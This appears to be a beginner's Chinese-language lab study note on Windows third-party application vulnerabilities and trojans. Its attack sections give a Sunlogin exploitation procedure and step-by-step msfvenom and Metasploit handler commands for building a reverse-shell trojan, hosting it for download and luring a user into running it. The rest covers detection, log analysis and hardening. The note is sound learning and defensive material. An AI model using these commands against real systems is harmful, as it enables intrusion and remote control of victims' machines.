文中所有操作皆是在靶场中进行操作的![]()
Windows 第三方应用漏洞与木马攻防实操核心笔记
核心框架
本资料围绕Windows 第三方应用程序漏洞展开,从攻击视角讲解木马制作与植入,从防御视角梳理木马排查、日志分析、系统防护方法,最终总结攻防核心知识与多维度防御措施,侧重实操命令与步骤。
一、第三方应用程序漏洞
1. 核心概念
第三方漏洞是非 Windows 系统基础框架外的应用软件 / 组件 / 服务(办公软件、远程控制工具、浏览器插件等)的安全缺陷,是系统打补丁后攻击者的主要入侵入口。
2. 典型案例:向日葵远程控制软件漏洞
受影响版本
- 向日葵个人版 for Windows ≤ 11.0.0.33
- 向日葵简约版 ≤ V1.0.1.43315(2021 年 12 月版本)
攻击流程(实操关键)
- 端口扫描:向日葵运行时开放40000-65535随机端口,扫描命令:
扫描结果中nmap -p 40000-65535 目标机IP # Kali/Windows CMD均可执行open状态的端口即为向日葵服务端口。 - 漏洞利用:
- 前置条件:攻击机安装JDK 8环境
- 启动工具命令:
java -jar Sunlogin漏洞利用工具.jar - 操作步骤:输入目标机 IP + 开放端口 → 执行利用 → 获取目标机 CMD / 文件管理控制权
防御手段
- 核心:将向日葵更新至最新版本(官方已修复漏洞)
- 辅助:防火墙限制向日葵端口访问,仅允许授权 IP 连接
二、攻击视角:木马制作与植入(Kali + Metasploit)
核心目标:制作反向连接木马,诱导目标机执行后实现远程控制,全程需保证攻击机与目标机网络互通。
1. 制作 Windows 木马程序
- 启动 Metasploit:
msfconsole - 生成 EXE 格式反向连接木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=自定义端口 -f exe > shell.exe- 参数说明:
-p指定攻击载荷;LHOST攻击机本机 IP;LPORT自定义监听端口(如 9999)
- 参数说明:
2. 搭建文件服务器(供目标机下载木马)
- 移动木马至 Apache 根目录:
mv shell.exe /var/www/html - 启动 Apache 服务:
service apache2 start - 验证:浏览器访问
http://攻击机IP/shell.exe,可下载即搭建成功
3. 攻击机开启监听(等待目标机连接)
msfconsole use exploit/multi/handler # 加载监听模块 set payload windows/meterpreter/reverse_tcp # 与木马云载一致 set lhost 0.0.0.0 # 监听所有网卡 set lport 自定义端口 # 与木马LPORT一致 run # 启动监听4. 木马植入与控制
- 植入方式:社会工程学(邮件 / 聊天发下载链接)、内网渗透(复制到共享文件夹)、漏洞利用(如 MS17-010)
- 启动木马:诱导目标机用户双击执行
shell.exe(可伪装为办公软件安装包) - 控制目标机:目标机执行后,攻击机显示
Meterpreter session 1 opened即连接成功,可执行ps(查进程)、screenshot(截屏)、shell(获取 CMD)等操作。
三、防御视角:木马排查手段
1. 系统自带工具排查(核心,无额外安装)
| 排查类型 | 实操工具 / 命令 | 重点排查内容 | |
|---|---|---|---|
| 进程排查 | 1. 任务管理器(Ctrl+Shift+Esc)2.msinfo32(Win+R 输入,软件环境→正在运行任务) | 陌生名称、CPU / 内存占用异常、路径异常(如C:\Windows\Temp)的进程,查看进程完整路径 / 启动命令 | |
| 网络连接排查 | 1.netstat -ano(查连接 / 端口 / PID)2. `tasklist | findstr "PID 号"`(关联进程) | ESTABLISHED(陌生 IP 连接)、LISTENING(异常端口监听)状态,通过 PID 定位可疑进程 |
| 服务排查 | 1.services.msc(Win+R 输入,图形化)2.net start(命令行,查运行中服务) | 运行中 / 自动启动、无厂商信息 / 名称陌生的服务 |
2. 自动启动项与计划任务排查(木马自启 / 重生关键)
(1)启动项排查
- 任务管理器:启动选项卡,禁用陌生启动项
- 启动文件夹:
- 用户级:
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup - 系统级:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
- 用户级:
- 注册表路径:
- 用户级:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - 系统级:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 用户级:
(2)计划任务排查
- 图形化:
taskschd.msc(Win+R 输入),查未知来源、触发条件为开机 / 定时的可疑任务 - 命令行:
schtasks /query(查看所有计划任务)
3. 第三方工具排查(针对性场景,精准检测)
| 工具名称 | 适用系统 | 核心功能 | 应用场景 |
|---|---|---|---|
| PCHunter | Windows 7 | 深度检测隐藏进程 / 驱动 / 端口,强制结束抗杀进程 | 应急响应、勒索病毒定位、删除顽固后门 |
| 火绒剑 | Windows 10/11 | 分析进程 / 网络 / 启动项(集成于火绒) | 系统维护、恶意程序溯源 |
| UserAssistView | 全 Windows 系统 | 解析注册表,查看程序执行记录(时间 / 次数) | 取证分析、判断攻击者操作痕迹 |
四、Windows 系统日志分析(应急响应取证关键)
1. 日志类型与查看方式
| 日志类型 | 记录内容 | 查看路径 |
|---|---|---|
| 应用程序日志 | 软件运行状态(安装失败、崩溃等) | 计算机管理→事件查看器→Windows 日志→应用程序 |
| 安全日志 | 账户登录 / 注销、权限变更、文件访问等安全操作 | 计算机管理→事件查看器→Windows 日志→安全 |
| 系统日志 | 系统服务启动 / 停止、驱动安装、系统错误等 | 计算机管理→事件查看器→Windows 日志→系统 |
2. 应急响应常用关键事件 ID
| 事件 ID | 事件描述 | 核心用途 |
|---|---|---|
| 4625 | 账户登录失败 | 检测暴力破解攻击 |
| 4624 | 账户登录成功 | 排查陌生 IP / 管理员账户异常登录 |
| 4720 | 创建用户账户 | 检测是否被植入隐藏用户 |
| 4732 | 将用户添加到管理员组 | 检测攻击者权限提升操作 |
| 4688 | 新进程创建 | 排查木马等可疑进程启动 |
五、Windows Defender 防护功能
1. 病毒与威胁防护
- 实时保护:云 AI 引擎 + 本地病毒库,实时扫描文件 / 进程,拦截恶意软件
- 离线扫描:系统启动前深度扫描,清除引导区病毒等顽固病毒
- 行为监控:检测异常进程行为(如修改注册表、批量加密文件)
2. 防火墙与网络保护
- 双向防火墙:默认阻止未授权入站连接,可自定义出站规则(禁止陌生程序联网)
- 网络隔离:自动识别专用 / 公用网络,公用网络下启用严格防护策略
六、学习总结与核心防御体系
1. 核心知识梳理
- 版本与风险:Win7/Server 2008 等老旧系统漏洞多、防御弱,Win10/11 防护强化,攻防需针对性操作
- 基础与利用:理解系统服务(SMB/RDP)、用户权限、注册表是掌握漏洞原理的关键
- 应急响应流程:发现异常(进程 / 端口 / 日志)→定位威胁(关联 PID / 路径 / 事件 ID)→清除威胁(结束进程 / 删文件 / 禁用启动项)→加固防护(打补丁 / 配置防火墙)
2. 多层面防御措施汇总(全覆盖,易落地)
| 防护层面 | 核心实操措施 |
|---|---|
| 网络层 | 1. 修改默认端口(如 RDP 3389 改为非默认)2. 配置 IP 白名单,仅允许授权设备访问3. 防火墙拦截危险端口(139/445/3389 等) |
| 账户层 | 1. 设置≥12 位强密码(大小写 + 数字 + 特殊符号)2. 启用账户锁定策略(如 5 次错误锁定 30 分钟)3. 禁用来宾账户,定期排查隐藏 / 影子用户 |
| 系统层 | 1. 定期通过 Windows Update 安装安全补丁2. 禁用危险协议(SMBv1)和不必要的系统服务3. 启用审核策略,记录登录 / 权限变更等关键安全事件 |
| 终端层 | 1. 启用并及时更新 Windows Defender2. 安装第三方杀毒软件(火绒、卡巴斯基等)3. 安全意识培训:不打开陌生附件、不点击可疑链接 |
这是小白通过写笔记想向大神们学习,里面有错误或者不足的地方,还请各位大神指出来,小生在这先感谢各位大神的观看和指导